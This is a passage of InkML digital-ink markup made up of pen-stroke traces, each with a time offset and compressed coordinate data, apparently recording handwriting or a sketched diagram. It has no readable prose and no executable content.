  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6631.45">15174 10160 0,'0'-13'47,"-225"-67"-32,79 67 1,-65-13-1,145 12-15,-67-12 16,27 13 0,-26-14-1,-27 27 1,-185 0 0,-79 0-1,304 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7962.42">6284 12303 0,'-40'0'62,"-277"53"-46,184-40-1,-383-13 1,0-53 0,120-13-1,303 66-15,-119-39 16,146 25-16,-106 1 16,-119-13-1,225 26-15,-185 0 16,-146 0-1,291 0-15,-185 0 16,-79-14 0,158 1-1,172 0-15,-79 0 16,-13 13 15,119 0-31,-1 0 0,-12 0 16,13 0 46,-1 0-30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8883.71">12700 11986 0,'-53'-40'31,"-53"0"-15,0 40 0,-13 0-1,-132 40 1,53 0 0,145-27-16,-80 0 15,-52 14 1,132-27-1,0 13 1,27-13 0,-27 13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9:31:40.2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6310 6032 0,'-39'27'47,"-14"-27"-31,39 13-16,-65 0 15,-119 1 1,105-1-16,-105 0 16,-54 0-1,-39 14 1,146-1 0,-93-13-1,92 1 1,53-14 15,80 0-31,-66 0 31,13 0-15,-14 0 0,-39 0-1,-106 0 1,67 0-1,131 0-15,-39 0 16,13 0 0,40 13-16,-14-13 15,-52 0 1,-80 26 0,-26 14-1,145-40-15,-79 13 16,-13 14-1,106-14-15,-27-13 16,-13 0 15,13 13-15,13 0 0,27-13-16,-40 0 15,-27 0 1,67 0-16,-66 0 15,39 0 1,-26 0 0,26 0-1,27 0-15,-13 0 16,-14 0 0,13 0-1,14-13 1,-26 0-1,-14-27 1,39 40 0,-65-39-1,39 12 1,27 14-16,-13 0 16,12-1 30,-12 1-30,26 0-16,-53-53 16,13 26-1,1-39 1,12 66 0,1-27-1,12 27-15,1-27 16,-26 0-1,12-13 1,14 40 15,0 13-31,13-26 16,-14-1 0,1 14-16,-13-27 15,-1-26 1,14 53-16,0 0 0,0-14 15,-14-26 1,1 27 0,26-27-1,0 40-15,0-14 16,0-26 0,0 27-1,0-1 1,0 1 15,0-27 0,0 40-15,0-14 0,13 14-1,27-13 1,-1 12-1,27-12 1,1 13 0,65-27-1,106 27 1,53 0 0,-106 13-1,0 0 1,-26-27-1,40 1 1,12-27 0,94 0 15,-67 26-15,436 14-1,-237 79 16,-14 40 16,-409-93-31,12 1 46,80-14-46,13 0 0,0 0 15,-13 0-15,-53 0-1,-27 0 16,54 0-15,-54 0-16,133 0 16,26 0-1,-79 0 1,-14 0 0,-39 0-1,-26 0 1,-14 0-16,0 0 31,14 0 0,-14 0-31,13 0 16,80 0 0,-79 13-16,12 0 15,-25 0 1,12 1 31,-26 65-32,0-39-15,0-14 0,0 14 16,0-1-16,40 28 16,-27-54-16,0 93 15,0-1 1,1-91-1,-1 25-15,0 1 16,-13-13 15,0-14-31,0 0 16,0 27 0,0-27-16,0 27 15,0-27-15,0 0 16,0 27-1,0-27 1,0 0 15,-13 40-15,0-26 0,-1-1-1,1-26-15,0 13 16,-27 14-1,-39 12 1,13-12 0,39-14-1,-26 0 1,40-13-16,0 0 0,0 0 16,-14 14-1,1-14 48,-27 0-48,26 0 1,1 0 0,13 0 15,-1 0 406,1 0-343,-66-27-78,39-13 15,14 27-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2646.77">4895 7660 0,'0'-14'31,"0"1"0,0 0-15,0 0-16,-13 0 15,-252 13 1,199 0-16,-172 0 16,-93 0-1,-13 0 1,13 0 15,278 0-31,-132 0 0,-66 0 31,39 0-15,159 0-16,-145 13 16,-67 26-1,186-25-15,-120-14 16,-78 0-1,224 0-15,-66 0 16,13 0 0,79 0-1,1-40 63,13-79-62,-1 53 0,1 39 15,0 14-31,13-13 16,0-14-1,0 27-15,0-27 16,0-13-1,0-13 1,0-40 0,0 93-16,-27-212 15,14 27 1,13 184-16,0-25 16,0-1-1,0 14 1,0-41-1,0 54-15,0-53 16,0 0 0,0 13 15,0 0-15,13 40-1,14-27 1,-27 27-16,13 0 15,53-14 1,14 27 0,211-53-1,13 14 1,0 12 0,-238 14-16,133-27 15,-27 27 1,-80 13-1,-12 0 1,-41 0 0,54 0-16,53 0 31,-120 0-31,120 0 16,-41 0-1,-25 0 1,-67 0-16,27 0 15,13 0 1,39 0 0,-65 0-16,39 0 15,-53 0 1,0 0 0,27 0-1,-14 0 1,27 0-1,-26 0-15,52 40 16,-13-14 0,-26 1 15,-13-1-15,12 14-1,14 13 1,-40-53-16,14 53 15,-1 39 1,1-26 0,12 40-1,54 185 1,-27-159 0,-53-105-16,14 39 15,-14-26 1,0-27-1,1 27 1,-1-1 15,13-12-15,-13-14-16,-13 14 16,40 65-1,-27-79-15,14 53 16,12 40-1,-39-79-15,27 39 16,-14-26 0,0-40-1,-13 26 32,14 1-31,-14-14-1,0 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9975.71">11046 9512 0,'0'0'0,"-172"-13"109,-53 13-93,67 0 0,-345 0-1,238 0 1,-26 0 0,40 0-1,-14 0 16,146 0-31,-39 0 32,131 0-32,-224 0 31,39 0-15,14 0-1,39 0 1,80 0-1,-14-14 1,80 14-16,0 0 16,-27-26 62,13 13-63,-26-27 1,40 27 15,13-27 16,0-26-31,0 0-1,0-14 1,13 41 0,14-27-1,-14 13 1,27-27 0,0 1-1,12-40 1,-25 53-1,26-40 1,-13 26 15,12-12-15,-25 65-16,26-12 16,26-41-1,-26 54 1,0-14-1,26 14 1,-12-1 0,38 14-1,67 13 1,-132 0-16,0 0 16,26 0-16,119 0 15,-145 0 1,-14 0-16,27 0 0,-13 13 0,158 14 15,40 12 1,27-25 0,-80-1 15,172 27-15,-92-14-1,-14-13 1,40-13-1,-132 13 1,-80 1 0,-65-14-1,-1 0 32,27 0-31,-27 13-16,40 106 15,-27-13 1,14 92 15,13-52-15,-27-80 0,-12-40-1,-1-26 1,-13 40-1,0 53 1,0-67-16,0 54 16,0-1-1,0 172 1,0-198 0,0-26-1,0 12 110,0-25-109,0-1-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13364.18">13930 9499 0,'-13'0'0,"26"0"0,-39 13 32,26 0 30,132 40-46,-52-40-16,131 27 15,93-40 1,-237 0-16,12 0 16,53 0-1,-79 0 1,27 0-1,12 0 1,1 0 0,237 0 15,-158 0-15,-92 0-1,-14 13 1,-26 0-1,13 1 1,13-14 0,40 0-1,-1 0 1,14-27 0,-26 1-1,-53 12 1,-27 14-16,27-13 15,-27 13-15,-13-13 16,26 13-16,-12 0 16,-1 0-16,13-13 0,40-1 31,1 1-15,-1 0-1,-53 13 1,0 0-1,14-26 17,12 26-17,14-27 1,-40 27 0,1-13-1,12 13 1,1 0 15,-14-40 16,-13 14-31,26-14-1,-12 0 1,12-13-1,-26 1 1,0 38-16,13-25 16,-13-1-1,0 27-15,0-27 16,13-13 0,1 0-1,-14 13 1,0 14-1,0 13 1,0-14 15,0-12-15,0-1 0,0 13-1,0-12 48,-27-1-48,14 27-15,-53 0 16,0-14 0,39 14-16,1 13 0,-173-40 15,14 14 1,66 13-1,-13 13 17,52 0-17,-250 0 17,118 0-17,40 0 1,53 0-1,106 0-15,-40 0 16,40 13 0,-1-13-16,-25 0 15,-54 39 1,67-39-16,-41 0 16,-25 14-1,-14-1 1,53-13-1,13 13-15,-105 0 0,-14 1 16,0-1 0,14-13 15,39 26-15,40-26-1,13 0 1,27 0-1,-14-13 1,-40 0 0,-12-27-1,39 27 1,26 13 0,1-13-1,13 13 1,0-14 31,-27 1-16,27 13-31,-67-13 16,1 0-1,0 0 1,39 13-1,-40 13 48,14 53-47,0 0-1,0 0 1,53-39-16,-14 12 15,-12 41 1,25-41 15,14-12-15,0-1 0,0 1-1,0-14 1,0 53-1,0 0 1,14 40 0,25-26-1,1-1 1,-40-53-16,13 1 16,0-27-16,1 26 15,-1-12 1,0-14-1,14 39 1,-14-26 0,53 14-16,132 39 31,-78 0-15,-15-26-1,-25 0 1,-27-14-1,0-13 1,13-13 0,-53 0-16,53 0 15,13 0 1,-12-26 0,-41 26-1,-13-13-15,27-14 16,13 14-1,-40 13-15,-13-13 16,13 13-16,1 0 16,-14-14-1,26-12 48,-13 26-48,0 0 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="17442.78">21220 9472 0,'-67'0'125,"54"0"-109,-119 0 0,39 0-1,67 0-15,-1 0 16,-26 0-16,-290 0 31,329 0-31,-224 0 16,53-13 15,-27 13-15,-39 0-1,66 0 1,-27 40-1,146-27 1,13-13 0,40 0-1,0 0 1,13 13 0,-14-13 93,-12 0-78,-27 0-15,-13 0-1,0 0 1,52 0 0,1 0 93,0 0-93,-40 0 15,13 0-15,27 0 202,-13-40-202,26 27 0,0-93-1,0 27 1,0-40-1,0 92-15,0-65 16,0-27 0,0 105-16,0 1 15,0 0 1,0 0 0,0-14-1,0 1 1,0 13-1,0-1 32,66-78-15,26-1-17,1 53 1,53-12-1,-41 38 1,-78 14-16,52 0 16,40 0-1,-66 0-15,-13 0 0,79 0 16,26 0 0,14-13-1,-27 13 1,-92 0-16,92 0 15,54 0 1,-147 0 0,1 0-16,66 0 15,26 0 17,-92 0-17,0 13 1,-14 1-16,120-1 15,92 13 1,-212-26-16,80 0 16,-27 0-1,14 0 48,0 0-48,-27 0 1,-53 0 0,40 0 46,-27 27-46,-12-14-16,-1 13 15,26 14 1,-39-27-16,14 14 0,-1-1 16,-13-13-16,26 67 15,14 12 1,-40-78-16,26 25 16,-12 28-1,-14 12 16,0-13-15,0-26-16,0-14 16,-14 14 77,-12-14-77,13 1 0,-27-14-1,14 0 1,-14 0 0,27-13-16,13 14 0,-40-14 15,14 0 1,-27 0-1,0 0 1,0 0 15,40 0-31,-1 0 0,-25 0 16,-14 13 0,40-13-16,-1 0 0,-25 0 15,12 0 1,14 0-16,-14 0 94,-39 26-79,27-12 1,12-1-1,14-13 1,0 13 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="22651.98">19063 8612 0,'-26'0'47,"-40"0"-31,39 0-16,-13 0 16,-12 0-16,-213-53 15,-26-26 1,-40-27-1,-26 13 1,-40-39 15,-39 0 1,303 66-17,67 52 1,13-12-1,0 26 1,40-13-16,-13 0 16,-14 13-1,-13 0 1,40 0-16,-40 0 16,-27 0-1,-39 0 1,40 13-1,66-13-15,-53 39 16,-67 41 15,94-40-15,-1-14 0,27-26-16,-27 40 15,27-27 1,0-13 46,-14 13-46,27 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23910.81">15597 8030 0,'-13'-13'47,"-119"105"-16,-1 94 1,80-147-17,40-25 1,13-1 140,80 0-140,-41-13-16,385 0 15,-305-13 17,-93 13-17,-13-66 126,-39-27-126,-1 67-15,-25-41 16,-15-25 0,54 52-1,0 14 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="48621.98">10676 11827 0,'0'-13'47,"-13"13"-32,-1 0-15,-91 0 16,12 0 0,-198-40-1,-66-13 1,158 27 0,-92-14-1,265 40 1,-67 0-16,54 0 0,-14 0 15,-53 0-15,-66 0 32,-66-27-17,-159 1 17,106 0-17,92-1 1,41 1-1,105 12-15,-80-12 16,-118 13 0,-40-1-1,13 14 1,159 0 0,93 0-16,-54 0 15,27 0 1,40 0-1,-40 0 1,14-13 15,-41 0 1,54 13-32,12 0 0,-52 0 15,-39 0 1,91 0-16,-65 0 15,52 0 1,14-53 93,-13-40-77,-1-39-17,27 106 32,0-14-31,0 14-1,27-41 1,-14 15 0,13 12-1,-12 0 1,-1 27 0,27-14-1,-27 1 1,0 26-1,14-13 1,-14 0 0,40-1-16,-14 14 15,27-26-15,199 26 32,-66 0-17,-133-13 1,-13 13-1,-40 0-15,66-14 16,53 14 0,40 0-1,-132 0-15,0 0 0,39 0 16,133 0 0,-53 0-1,-14 0 1,80 0-1,-13 0 17,66 0-17,370 67 17,-582-67-32,-13 0 0,39 0 15,54 0 1,-133 0-16,53 0 15,67 0 1,-14 0 0,39 0-1,28 0 1,-107 0 0,-66 0-16,40 0 15,-40 0-15,1 0 16,-1 0 31,53 0-32,-40 0 17,27 0-17,0 0 1,-13 0-1,-14 0-15,-12 0 0,12 0 32,1 13 46,-14 13-63,13 1 1,14 26 0,-14-27-1,14 27 17,0 13-17,-27-13 1,27 53-1,-27 119 1,13-106 0,-26-93-1,0 1 1,0-14 31,0 13-32,-13 14 1,0-13 0,-14 12-1,-12 14 17,39-40-17,-27 1 110,14 12-109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9:37:43.7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19963 11470 0,'-13'53'16,"-93"-14"-1,-106-12 1,-145-14 15,-106-13-15,344 0-16,-384-13 16,-238-93-1,278 40 1,119 13-1,106 13 1,0 40 0,13-26-1,-39 26 1,224 0-16,-106 0 16,1 0-1,-40 0 1,-1 0-1,133 0 1,-105 0-16,-94 0 31,80 0-15,0 0 0,-13 13-1,0 0 1,145 0-16,-52 1 15,-14-14 1,53 0 0,13 0-1,1 13 1,-14 0 0,39 0-16,-78-13 31,-27 0-16,106 0 79,-14 0-78,-26-92-1,0-14 1,0 13 0,27 40-1,13 40-15,-14-13 16,1-1 0,-14 1-1,-26-27 1,13 26-1,0 14 17,27 13-32,-14-13 15,-66-14 1,66 27 0,14 0-1,13 0 1,-14 0-1,-12 0 1,-14 0 0,39 0-1,1 0 63,13-26-62,-13 0-16,370-226 31,-145 146-15,-146 80-16,172-40 16,-66 13-1,-93 40 1,67-1-1,-14 14 1,40 0 0,-145 0-16,118 0 15,-92 0-15,119 0 16,-132 0-16,185 0 16,-53 0-1,0 0 1,-14 27-1,-52-1 1,-13 1 15,-53-1-15,65-13 0,-12 40-1,357 0 1,-239 40-1,1-14 1,-40-13 0,-13-13-1,-133-39-15,80 12 16,93 0 0,-14 1-1,0-27 1,-13 0-1,-13 0 1,-133 0 0,80 0-1,53 0 1,-40-27 0,13 14-1,27-40 1,-40 14-1,-79 25-15,52 1 16,54 13 0,-27-13-1,0-14 1,-53 14 0,-13 13-1,-40 0 16,14 0-15,12 0 62,27 40-62,-13 0-1,-13 13 1,13-14 0,0 1-1,-40-40-15,40 40 16,-13-1 0,-27-12-1,0 26 1,-13 13-1,0-13 1,13 0 15,-13-40-31,0 53 16,0-26 0,0 26-1,0-26 1,14-14-1,-14-13 1,0 14 0,0 12-1,-14 14 1,-78 0 0,26-40-1,0 27 1,52-40-16,1 0 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3735.57">21220 10517 0,'-146'0'62,"-26"-26"-46,132 12-16,-132 1 16,-39 0-1,65 13 1,27 0-1,93 0-15,-93 0 16,-40 0 0,-40 0-1,-131 26 1,25 14 0,54 13-1,185-40-15,13 1 16,-145 12-16,26-26 15,66 0 1,13 0 0,54 0 15,-14 0-15,13 0-1,-53-13 1,54 13-16,-28 0 15,-12 0 1,-40 0 0,13-13-1,93 13-15,-80 0 16,-39 0 0,-93-14-1,93 14 16,0-13-15,-40-13 0,158 12 15,14-12 125,-13-14-140,-27 1-1,1 39 1,12-14 15,27-65 16,0 0-31,0 12-1,0 1 1,0 13 0,0 14-1,0 25-15,0-12 16,0-14 0,0-26-1,14 0 1,25 40-1,1 12 1,39-25 0,133-1 15,-27 27-15,0 13-1,-26 0 1,53 0-1,-40 0 1,53 0 0,-53 0-1,-53 0 1,0 0 0,-13 0-1,39 0 1,67 0-1,13 13 1,-27 13 15,-52 1-15,-54-27 0,-79 0-16,27 0 0,0 0 15,79 0 1,13 0-1,40 0 1,-13 0 0,-27 0-1,-92 0-15,53 0 16,26 0 0,26-13-1,40-14 1,-26 14-1,-93 0 1,-53 13 0,14-13-1,13 13 1,-14 0-16,14-14 16,66-25-1,-27 39 1,-66 0-16,40-14 15,-26 14 1,12-13 0,27 0-1,27 13 1,13 0 0,-93 0-16,53 0 15,-39 0 1,-27-13-1,0-1 32,53 14-31,-27 0-16,14 0 16,-14 0-1,-13 27 48,1-27-48,-14 13 1,13 67 0,-13-1-1,0 0 1,0-66-1,0 27-15,0-13 16,0 12 15,0-12-15,0 12 0,0-25-1,0-1 1,0 13 15,0 1-15,-13-1-1,-14 14 1,1-14 0,12 27-1,1-26 1,-13-1-1,26-12 1,-27 12 15,14-13-31,-13 27 16,-27-14 0,39-12-16,14-1 0,-26 0 15,13 13 1,-14-12-1,1 12 1,13-13 0,-14 1-1,14-14-15,13 13 0,-13-13 16,0 0 0,-14 0-1,1 13 1,-1 0-1,-13-13 1,27 0 0,-26 0 15,25 0-15,-25 0-1,12 0 1,1 0-1,12 0 1,-25 0 0,26 0-16,-14 0 15,-26 0 1,0 0 0,0 0-1,40 0 1,0 0-1,0 0 48,-1 0-47,1 0-16,0 0 31,0 0 109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9:38:04.6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6297 4194 0,'-26'0'93,"-120"0"-77,-52 0 15,-1 0-15,14 0 0,66-14-1,106 14-15,-93 0 16,27-13-1,-27 13 1,40 0 0,-27 0-1,40 0 1,40 0-16,-27 0 16,-39 0-1,39 0 1,0 0-1,1 0 1,25 0 15,1 0-15,0 0 0,-13 0-1,-1 0 48,27 13-48,-13 40 1,-14 40 0,14 13-1,-13-14 1,26-25-16,0 197 15,0-158 1,0 0 0,0-53 15,0 13-15,0-40-1,0-12-15,0 12 16,0 14-1,0 26 1,0-13 0,0 26-1,0-39 1,0-27-16,-14 13 16,1 1-1,13-1 1,0-12-1,13-14 110,133 13-109,-106-13-16,118 0 16,41 0-1,-40 0 1,13-13 0,-120-1-16,81 1 15,26-13 1,-120 26-1,54 0-15,13-27 16,-53 14 0,-14 13 15,-12 0-15,39-26-1,-53-1 1,53 1-1,-26-1 1,26-13 0,-39 27-16,12 0 15,-26 0-15,40-14 16,0 14 0,-39-27 77,-1 27-77,-13 0-16,0 0 0,0-27 16,0 0-1,0 27-15,0-13 16,0-14-1,0-13 1,0-53 0,-27 27-1,14 39 1,-13 0 0,12-26-1,14 53-15,-13-40 16,13 40-16,-13-13 15,0-27 1,-1 26 0,1-13 15,13 1-15,0 12-1,-13-12 1,0 39-1,13-27 1,0 14 93,-27-27-93,27 27 0,-13-27 15,-13 14 0,12-1 47,1 14-62</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="881.01">5292 5755 0,'0'13'47,"0"93"-31,-27 26-1,27-39 1,0-67 0,-13 53-16,13 41 31,0-54-15,0-40-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1948.56">5199 5980 0,'0'-40'109,"27"0"-93,39 14-1,-13 13 1,-40 13 0,0 0-1,13 0 63,1 0-62,-1 13 0,1 0-1,-14 27 1,-13-1-1,0-12 1,0-1 62,-106 40-62,40-39-1,0-1 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2658.71">5913 6072 0,'0'-13'15,"-13"13"1,-26 0 0,-54 0 15,27 0-15,53 0-16,-14 40 15,-13-14 1,1 1-1,25 12 1,14-12 0,0-14 62,106 13-63,27 1 1,-80-27 0,-40 0 15,26 0-15,-12 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3238.57">6099 5755 0,'26'26'78,"-26"-13"-62,13 27 0,1 26-1,-14 27 1,0-1-1,0-65-15,0 52 16,0-52 0,0-14-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7718.46">6469 4802 0,'13'13'218,"67"14"-202,25-14 0,-12-13-1,-66 0-15,39 27 16,53-14-1,-27-13 1,-52 0 0,26 0-1,-39 0 1,-14 0-16,27 0 16,-1 0-1,1 0 1,0 0-1,-1 0 17,-12 0-1,-27-13-15,39-1-1,1 14 1,92 0-1,-39 0 1,39-13 0,-39 0-1,-40 0 1,0 13 0,0 0-1,0 0 1,13 0-1,-53 0-15,40 0 16,0 0 0,0 0 15,0 0-15,-27 0-1,40 0 1,14 0-1,-14 0 1,-13 0 0,0 0-1,-40 0 1,27 0 0,12 0-1,1 0 1,-39 0-1,25 0 1,14 0 0,27 0 15,-14 0-15,-40 0-1,1 0 1,-1 0 15,93 0-15,-39 0-1,25 0 1,-91 0 0,-1 0 46,-13-67 94,-13-12-140,-1 53-16,14-40 16,0-54-1,0 1 1,0-26-1,0 92 1,0 27 0,0 12-1,0-25 1,0-1 0,0 0-1,0-13 1,0 27-1,0-1 1,0 1 0,0-1-1,0 1 1,0 13 0,40 0 109,53 13-110,-54 13-15,80 13 16,93 14-1,-80-14 1,-39-12 0,-27-1-1,0-13 1,-39 0-16,12 0 16,147-13-1,-94-1 1,-39 14-1,-40-13 1,1 13 0,25-13 31,80 13-32,-26 0 1,-40 0-1,-27 0 1,-26-40 47,40 1-48,-14 12 1,27-13-1,-39 14 1,12-1 15,-13 14-15,1 13 0,-14-13-1,13 0 32,26 13-31,54 0-1,-53 26 1,-27-26-16,13 40 16,14 79-1,-13-40 1,-1-12-1,-13-54 1,-13 26-16,13 1 16,1 0 15,-14 0-15,13-1-1,0 1 1,-13 0-1,0-27-15,13 13 0,-13 1 16,0-14-16,27 80 16,13 12-1,-40-91-15,13 52 16,0 26 0,13-39-1,-26-40-15,0 27 16,14 53-1,-14-80-15,26 159 16,-13-40 15,27-92-15,-40-27 0,-66 0 30,-13 1-30,-27 12 0,-146-13-1,67 1 1,-13-14 0,65 0-1,54 0 1,-27 0-1,-26 0 17,119 0-32,-80 0 15,-13 0 1,53 0 0,0 0-1,1 0 1,12 0-1,27 0-15,-27 0 16,-26 0 0,39 0-16,-52 0 15,13 0 1,26 0 0,0-14-1,1 1 1,25 13 93,-12-26-93,-27-14-1,40-13 1,-27 0 0,14 13-1,13 1 1,-14-1 0,27 0-1,-26 1 1,12-14-1,-12 26 1,26 1 0,-13-1 15,13 14-31,-14 0 16,14 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9455.82">10570 4273 0,'-93'13'32,"-131"133"-17,118-67 1,66-39-1,40-27 1,0 27 47,0 13-48,13-14-15,67 14 16,52-13-1,-53 13 1,-52-53 0,-14 66 62,-39-26-63,-80 52 1,26-39 0,54-53-1,-1 0 1,1 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13498.41">11959 4657 0,'13'0'203,"80"0"-188,-80 0 1,67 0 0,-67 0-16,53 0 15,-13 0 1,-27 0-1,1 0 1,-1 0 0,-13 0-1,14 0 1,-1 0 0,14 0 15,26 0 0,-26 0-31,-14 0 16,-12 0-1,-1 0 1,0 0 31,14 0-32,-1 0 1,14 0 0,-27 0-16,13 0 15,1 0 17,-14 0-17,14 0 1,-1-14-1,-26 1 1,40 13 15,-1 0-15,27 0 0,-26-13-1,-13 13 1,-14-13-1,13 13 1,14-13 0,-14-1-1,-12 14-15,12 0 16,1 0 0,-1 0 109,1 0-110,12 0 1,1 0-1,0 0 1,13 0 0,-40 0-16,13 0 15,1 0 17,-1 0-17,27 0 1,0 0-1,-27 0 1,1 0 0,-14 0 15,0 0-15,27 0-1,0 0 1,-27 0-16,0 0 15,14 0 1,-14 0 0,0 0-1,0 0 1,14 0 0,-14 0-16,0 0 31,27 0 234,-27 0-249,40 0 0,-40 0 15,1 0-31,12 0 47,-13 0 47,0 0-79,14 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="21159.24">16444 3559 0,'-13'0'47,"-1"0"-31,-12 0-1,-14 0 1,14 0-1,-14-14 1,27 14-16,-14 0 16,-52-26-1,0 26 1,-1 0 0,-12 0-1,-1 0 1,67 0-16,-54 0 15,-79 0 1,54 0 0,-54 0 15,93 0-15,-14 0-1,54 0-15,-1 0 16,-12 13-1,12 0 1,-12 14 0,12-27-1,1 0 1,12 0-16,-12 26 16,0-26-1,-1 27 1,27-14-1,-13-13 48,-27 40-47,1-1-1,-1-12 1,13-14-1,14 14 1,0 12 15,0-12-15,13 26 0,0-14-1,0-25-15,0-1 16,0 40-1,0-27 1,0 14 0,0-14 15,0 14-15,0-14-1,0 14 1,0 26-1,0 14 1,0 12 0,0-26-1,13-26 1,-13 13 0,0 0-1,0 0 1,0 26-1,0-26 1,13 13 0,14-26 15,-27-14-15,0-12-1,26 12 1,-26-13-1,13 14 1,1-1 0,-14 1-1,13 12 1,0-12 0,0-27-1,-13 13 1,40 14-1,-14-1 1,14 14 0,0-40 15,39 26-15,-66-26-16,53 0 15,27 0 1,-80 0-16,93 0 15,-13 0 1,13-13 0,-14 0-1,14 13 1,-40 0 0,-39 0-16,39 0 15,-13 0 1,0-27-1,13 27 1,-53-13 0,40 13-16,-13 0 31,-27 0-31,13-13 16,14 0-1,13 13 1,-27 0-1,40 0 1,-13-27 0,0 27-1,0 0 1,0 0 0,-26-13-1,-1 13 1,1-13-1,-1-1-15,-26 1 16,40-13-16,-14 12 16,27-25 15,-13 12-15,-27 14-1,0-13 1,-13 12-16,13-25 15,1-1 1,-14-13 0,0 0-1,13 0 1,0-13 0,-13 0-1,0 13 1,0 40-1,0-14-15,0-12 16,0 12 0,0 1 15,0 13-31,0-27 16,0 13-1,0 1 1,0-1-1,0 1 1,0 13 0,-13 0 46,13-14-46,0-13-1,0 1 1,-27-1 0,27 27 31,0-14-1,-13 14-30,0-13 0,0-1-1,13 1 1,-13 13 0,13-1-1,0 1 1,-14 0-1,14 0 1,0-1 0,-26-12 15,13-1-15,13 1-1,-14 0 1,1-1-1,13 14-15,-13 13 16,13-13 0,-27-14-1,14 1 17,0-1-17,13 14-15,-13 13 16,0-26-1,-1 26 1,14-14 109,-13 14-16,0-13-93,13 0 47,-13 0-48,-14-1 1,14 14 31,0 0-32,-1 0 126,-12 0-125,13 0-1,0 0 1,-14 0 15,14 0-15,0 0 15,-1 0 16,-12 0-32,13 0 1,-1 0-16,1 0 31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="22133.33">15478 4075 0,'0'53'94,"0"79"-79,0 0 1,13-26 0,1-13-1,-1-1 1,-13-79-16,0 53 16,0 40-1,0-40 1,0 14-1,0-40 1,0-1 0,0-26-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24171.77">15544 4352 0,'0'-13'110,"0"0"-95,0-14 1,0-39 0,0 27-1,0-14 1,0 26-1,0 14 1,0 0 31,13 13-31,40-13-1,0-1 1,-39 14-16,12 0 15,-13 0 1,14 0 47,-1 0-17,27 14-30,-40-1-16,14 13 16,-14-26 15,-13 14-31,13-1 16,0 13-1,-13 1 1,14 12-1,-14-25 1,0-1 0,0 0-16,0 0 15,0 27 1,0-27-16,0 27 16,0 13-1,0 0 1,-27-27-1,27-13 1,-13-13 31,-13 27-31,-14-14-1,0 14 1,27-27-16,0 0 15,-1 0 17,1 13-17,0 0 1,0-13 0,0 0-1,-14 0 16,1 0-15,12 0 172,1 0-173</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="25312.39">15597 4630 0,'0'13'78,"13"1"-15,27 12-48,-27-26-15,14 13 16,26 14 0,-53-14-1,39 0 1,-25-13-1,-1 13 1,0-13 31,14 14-31,-14-1-1,26 13 1,-25-12-1,-1 12 1,0-13 93,27 1-93,-40-1-16,26 13 16,-12-13 93,-1 1-93,0-14-1,-13 26 1,0-13 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27653.5">14248 4617 0,'0'-13'31,"13"13"0,0 0-15,0 0 0,14 0-1,-14 0 1,14 0-1,-14 0 1,13 0 15,-12 0-31,-1 0 16,13 13 0,-13-13-1,1 0 1,12 0-1,14 13 1,-14-13 15,-12 0 1,-14 13-17,13-13 1,0 0 62,13 14-16,-12-1-46,-14 0 0,13-13-1,0 0 1,14 27 15,-1-27 16,-13 13-16,-13 0 235</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="49706.59">8334 4842 0,'14'53'156,"-28"-40"-140,1 27-1,13 13 1,-13-40-16,0 40 15,-14 13 1,27-26 0,0 13-1,0-1 1,0 28 0,0-54-16,0 14 15,0 0 1,0-1-1,0-12 1,0-14 0,0 13-1,0 1 1,0 26 0,0 26-1,0 40 1,40-26-1,-14-14 1,1-13 0,-27-13-1,13-26 1,0-14 0,-13 0-16,0 14 15,0 26 1,0-27-1,0 27 17,14-27-32,-1 14 31,-13-27-31,13 14 16,-13-14-1,0 0 63,13 14-62,-13 26 0,13-27-1,-13-13 1,0 1-1,0 25 79,0-26-63,0 1 48,-13-1-33,-53 0-30,-13-13 0,39 0 15,27 0-31,-14 0 16,-52 0-1,13 0 1,0 0-1,-14 0 1,-26 0 0,67 0-1,-14 0 1,26 0 0,1 0-1,-27 0 1,0 0-1,40 0-15,-40 0 16,13 0 0,1 0-1,12 0 17,14 0-17,0 0 1,13 93 78,0 26-79,0 0 1,0-13-1,0-67 1,0 14 0,0-26-1,0 12-15,0 14 32,0 27-17,0 26 1,-27-1-1,1-38 1,26-41 0,0-13-16,0 14 15,0 12 95,13 1-95,13-27-15,80 27 16,-13-27 15,-40 0-15,0-13-1,-27 0 1,40 0 0,-52 0-16,25 0 15,27 14 1,-39-14-16,39 0 16,185 0-1,-158 0-15,-40-14 0,39-12 16,-12 0-1,-14 26 1,-26 0 0,52-40 15,14 13-15,-40 1-1,0 0 1,-39 26-1,-1-27 1,1 14 0,-14-14-1,0 27 1,-13-26 0,0-27-1,0-13 1,0-27-1,0 14 1,0 52-16,0-65 16,-26-27 15,-14 26-15,14 27-1,12 53 1,-25-40-1,12 26 1,-39 1 0,13-1-1,27 27 1,12 0-16,-12-26 16,-27 26-1,53-13-15,-66-14 16,0 1-1,13 13 